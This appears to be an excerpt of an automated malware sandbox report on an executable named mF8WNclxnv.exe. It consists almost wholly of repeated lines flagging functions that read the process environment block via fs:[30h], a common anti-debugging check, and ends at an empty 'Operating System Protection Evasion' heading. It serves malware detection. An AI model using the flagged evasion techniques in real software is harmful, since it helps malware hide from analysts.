Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AF626 mov eax, dword ptr fs:[00000030h]	8_2_339AF626
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AF626 mov eax, dword ptr fs:[00000030h]	8_2_339AF626
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A4D660 mov eax, dword ptr fs:[00000030h]	8_2_33A4D660
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9660 mov eax, dword ptr fs:[00000030h]	8_2_339E9660
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9660 mov eax, dword ptr fs:[00000030h]	8_2_339E9660
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A4D5B0 mov eax, dword ptr fs:[00000030h]	8_2_33A4D5B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A4D5B0 mov eax, dword ptr fs:[00000030h]	8_2_33A4D5B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F5BE mov eax, dword ptr fs:[00000030h]	8_2_33A6F5BE
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A435BA mov eax, dword ptr fs:[00000030h]	8_2_33A435BA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A435BA mov eax, dword ptr fs:[00000030h]	8_2_33A435BA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A435BA mov eax, dword ptr fs:[00000030h]	8_2_33A435BA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A435BA mov eax, dword ptr fs:[00000030h]	8_2_33A435BA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A835B6 mov eax, dword ptr fs:[00000030h]	8_2_33A835B6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15A9 mov eax, dword ptr fs:[00000030h]	8_2_339D15A9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15A9 mov eax, dword ptr fs:[00000030h]	8_2_339D15A9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15A9 mov eax, dword ptr fs:[00000030h]	8_2_339D15A9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15A9 mov eax, dword ptr fs:[00000030h]	8_2_339D15A9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15A9 mov eax, dword ptr fs:[00000030h]	8_2_339D15A9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3B594 mov eax, dword ptr fs:[00000030h]	8_2_33A3B594
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3B594 mov eax, dword ptr fs:[00000030h]	8_2_33A3B594
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D95DA mov eax, dword ptr fs:[00000030h]	8_2_339D95DA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E55C0 mov eax, dword ptr fs:[00000030h]	8_2_339E55C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A855C9 mov eax, dword ptr fs:[00000030h]	8_2_33A855C9
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D15F4 mov eax, dword ptr fs:[00000030h]	8_2_339D15F4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A2D5D0 mov eax, dword ptr fs:[00000030h]	8_2_33A2D5D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A2D5D0 mov ecx, dword ptr fs:[00000030h]	8_2_33A2D5D0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A835D7 mov eax, dword ptr fs:[00000030h]	8_2_33A835D7
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A835D7 mov eax, dword ptr fs:[00000030h]	8_2_33A835D7
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A835D7 mov eax, dword ptr fs:[00000030h]	8_2_33A835D7
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F525 mov eax, dword ptr fs:[00000030h]	8_2_33A5F525
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E7505 mov eax, dword ptr fs:[00000030h]	8_2_339E7505
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E7505 mov ecx, dword ptr fs:[00000030h]	8_2_339E7505
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A85537 mov eax, dword ptr fs:[00000030h]	8_2_33A85537
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ED530 mov eax, dword ptr fs:[00000030h]	8_2_339ED530
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ED530 mov eax, dword ptr fs:[00000030h]	8_2_339ED530
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BD534 mov eax, dword ptr fs:[00000030h]	8_2_339BD534
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B550 mov eax, dword ptr fs:[00000030h]	8_2_33A5B550
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B550 mov eax, dword ptr fs:[00000030h]	8_2_33A5B550
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B550 mov eax, dword ptr fs:[00000030h]	8_2_33A5B550
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AB562 mov eax, dword ptr fs:[00000030h]	8_2_339AB562
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A574B0 mov eax, dword ptr fs:[00000030h]	8_2_33A574B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AB480 mov eax, dword ptr fs:[00000030h]	8_2_339AB480
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B9486 mov eax, dword ptr fs:[00000030h]	8_2_339B9486
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B9486 mov eax, dword ptr fs:[00000030h]	8_2_339B9486
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A74B0 mov eax, dword ptr fs:[00000030h]	8_2_339A74B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A74B0 mov eax, dword ptr fs:[00000030h]	8_2_339A74B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E34B0 mov eax, dword ptr fs:[00000030h]	8_2_339E34B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A594E0 mov eax, dword ptr fs:[00000030h]	8_2_33A594E0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A814F6 mov eax, dword ptr fs:[00000030h]	8_2_33A814F6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A814F6 mov eax, dword ptr fs:[00000030h]	8_2_33A814F6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A854DB mov eax, dword ptr fs:[00000030h]	8_2_33A854DB
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D340D mov eax, dword ptr fs:[00000030h]	8_2_339D340D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A37410 mov eax, dword ptr fs:[00000030h]	8_2_33A37410
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A8547F mov eax, dword ptr fs:[00000030h]	8_2_33A8547F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BB440 mov eax, dword ptr fs:[00000030h]	8_2_339BB440
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6F453 mov eax, dword ptr fs:[00000030h]	8_2_33A6F453
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B450 mov eax, dword ptr fs:[00000030h]	8_2_33A5B450
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B450 mov eax, dword ptr fs:[00000030h]	8_2_33A5B450
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B450 mov eax, dword ptr fs:[00000030h]	8_2_33A5B450
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5B450 mov eax, dword ptr fs:[00000030h]	8_2_33A5B450
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460 mov eax, dword ptr fs:[00000030h]	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460 mov eax, dword ptr fs:[00000030h]	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460 mov eax, dword ptr fs:[00000030h]	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460 mov eax, dword ptr fs:[00000030h]	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1460 mov eax, dword ptr fs:[00000030h]	8_2_339B1460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339CF460 mov eax, dword ptr fs:[00000030h]	8_2_339CF460
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9B9F mov eax, dword ptr fs:[00000030h]	8_2_339E9B9F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9B9F mov eax, dword ptr fs:[00000030h]	8_2_339E9B9F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9B9F mov eax, dword ptr fs:[00000030h]	8_2_339E9B9F
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A83B80 mov eax, dword ptr fs:[00000030h]	8_2_33A83B80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A83B80 mov eax, dword ptr fs:[00000030h]	8_2_33A83B80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A83B80 mov eax, dword ptr fs:[00000030h]	8_2_33A83B80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6FB97 mov eax, dword ptr fs:[00000030h]	8_2_33A6FB97
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDBA0 mov eax, dword ptr fs:[00000030h]	8_2_339DDBA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C3BD6 mov eax, dword ptr fs:[00000030h]	8_2_339C3BD6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C3BD6 mov eax, dword ptr fs:[00000030h]	8_2_339C3BD6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C3BD6 mov eax, dword ptr fs:[00000030h]	8_2_339C3BD6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C3BD6 mov eax, dword ptr fs:[00000030h]	8_2_339C3BD6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C3BD6 mov eax, dword ptr fs:[00000030h]	8_2_339C3BD6
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6FBF3 mov eax, dword ptr fs:[00000030h]	8_2_33A6FBF3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7BCD mov eax, dword ptr fs:[00000030h]	8_2_339A7BCD
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7BCD mov ecx, dword ptr fs:[00000030h]	8_2_339A7BCD
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B9BC4 mov eax, dword ptr fs:[00000030h]	8_2_339B9BC4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F1BEF mov eax, dword ptr fs:[00000030h]	8_2_339F1BEF
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F1BEF mov eax, dword ptr fs:[00000030h]	8_2_339F1BEF
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3FBDC mov eax, dword ptr fs:[00000030h]	8_2_33A3FBDC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3FBDC mov eax, dword ptr fs:[00000030h]	8_2_33A3FBDC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A3FBDC mov eax, dword ptr fs:[00000030h]	8_2_33A3FBDC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov eax, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov eax, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov eax, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov eax, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov eax, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDB00 mov edx, dword ptr fs:[00000030h]	8_2_339DDB00
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1B04 mov eax, dword ptr fs:[00000030h]	8_2_339B1B04
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B1B04 mov eax, dword ptr fs:[00000030h]	8_2_339B1B04
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6FB0C mov eax, dword ptr fs:[00000030h]	8_2_33A6FB0C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9B28 mov eax, dword ptr fs:[00000030h]	8_2_339E9B28
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E9B28 mov eax, dword ptr fs:[00000030h]	8_2_339E9B28
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A83B10 mov eax, dword ptr fs:[00000030h]	8_2_33A83B10
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53B60 mov eax, dword ptr fs:[00000030h]	8_2_33A53B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53B60 mov eax, dword ptr fs:[00000030h]	8_2_33A53B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53B60 mov eax, dword ptr fs:[00000030h]	8_2_33A53B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53B60 mov eax, dword ptr fs:[00000030h]	8_2_33A53B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A53B60 mov eax, dword ptr fs:[00000030h]	8_2_33A53B60
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AFB4C mov edi, dword ptr fs:[00000030h]	8_2_339AFB4C
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A45B50 mov eax, dword ptr fs:[00000030h]	8_2_33A45B50
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A45B50 mov eax, dword ptr fs:[00000030h]	8_2_33A45B50
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A61AA3 mov eax, dword ptr fs:[00000030h]	8_2_33A61AA3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A61AA3 mov eax, dword ptr fs:[00000030h]	8_2_33A61AA3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A61AA3 mov eax, dword ptr fs:[00000030h]	8_2_33A61AA3
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5DAAC mov ecx, dword ptr fs:[00000030h]	8_2_33A5DAAC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5DAAC mov ecx, dword ptr fs:[00000030h]	8_2_33A5DAAC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5DAAC mov eax, dword ptr fs:[00000030h]	8_2_33A5DAAC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7A80 mov eax, dword ptr fs:[00000030h]	8_2_339A7A80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7A80 mov eax, dword ptr fs:[00000030h]	8_2_339A7A80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A7A80 mov eax, dword ptr fs:[00000030h]	8_2_339A7A80
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6FA87 mov eax, dword ptr fs:[00000030h]	8_2_33A6FA87
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDAAE mov eax, dword ptr fs:[00000030h]	8_2_339DDAAE
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBAA0 mov eax, dword ptr fs:[00000030h]	8_2_339BBAA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBAA0 mov eax, dword ptr fs:[00000030h]	8_2_339BBAA0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AFAA4 mov ecx, dword ptr fs:[00000030h]	8_2_339AFAA4
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DBADA mov eax, dword ptr fs:[00000030h]	8_2_339DBADA
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A31ACB mov eax, dword ptr fs:[00000030h]	8_2_33A31ACB
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A31ACB mov ecx, dword ptr fs:[00000030h]	8_2_33A31ACB
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A45AD0 mov eax, dword ptr fs:[00000030h]	8_2_33A45AD0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ABAE0 mov eax, dword ptr fs:[00000030h]	8_2_339ABAE0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339D9A18 mov ecx, dword ptr fs:[00000030h]	8_2_339D9A18
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339ABA10 mov eax, dword ptr fs:[00000030h]	8_2_339ABA10
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E5A01 mov eax, dword ptr fs:[00000030h]	8_2_339E5A01
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E5A01 mov ecx, dword ptr fs:[00000030h]	8_2_339E5A01
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E5A01 mov eax, dword ptr fs:[00000030h]	8_2_339E5A01
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339E5A01 mov eax, dword ptr fs:[00000030h]	8_2_339E5A01
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6FA02 mov eax, dword ptr fs:[00000030h]	8_2_33A6FA02
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov eax, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov ecx, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov eax, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov eax, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov eax, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339BBA30 mov eax, dword ptr fs:[00000030h]	8_2_339BBA30
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5BA0B mov eax, dword ptr fs:[00000030h]	8_2_33A5BA0B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5BA0B mov eax, dword ptr fs:[00000030h]	8_2_33A5BA0B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5BA0B mov eax, dword ptr fs:[00000030h]	8_2_33A5BA0B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5BA0B mov eax, dword ptr fs:[00000030h]	8_2_33A5BA0B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A57A11 mov edi, dword ptr fs:[00000030h]	8_2_33A57A11
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDA20 mov eax, dword ptr fs:[00000030h]	8_2_339DDA20
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339DDA20 mov eax, dword ptr fs:[00000030h]	8_2_339DDA20
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A2DA1D mov eax, dword ptr fs:[00000030h]	8_2_33A2DA1D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339A9A40 mov ecx, dword ptr fs:[00000030h]	8_2_339A9A40
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A43A78 mov eax, dword ptr fs:[00000030h]	8_2_33A43A78
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AB991 mov eax, dword ptr fs:[00000030h]	8_2_339AB991
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339AB991 mov eax, dword ptr fs:[00000030h]	8_2_339AB991
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990 mov eax, dword ptr fs:[00000030h]	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990 mov eax, dword ptr fs:[00000030h]	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990 mov eax, dword ptr fs:[00000030h]	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990 mov eax, dword ptr fs:[00000030h]	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339C5990 mov ecx, dword ptr fs:[00000030h]	8_2_339C5990
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A879BC mov eax, dword ptr fs:[00000030h]	8_2_33A879BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A879BC mov ecx, dword ptr fs:[00000030h]	8_2_33A879BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A879BC mov eax, dword ptr fs:[00000030h]	8_2_33A879BC
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A39983 mov eax, dword ptr fs:[00000030h]	8_2_33A39983
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6598D mov eax, dword ptr fs:[00000030h]	8_2_33A6598D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6598D mov eax, dword ptr fs:[00000030h]	8_2_33A6598D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A6598D mov eax, dword ptr fs:[00000030h]	8_2_33A6598D
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F99B mov eax, dword ptr fs:[00000030h]	8_2_33A5F99B
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_33A5F99B mov eax, dword ptr fs:[00000030h]	8_2_33A5F99B

HIPS / PFW / Operating System Protection Evasion

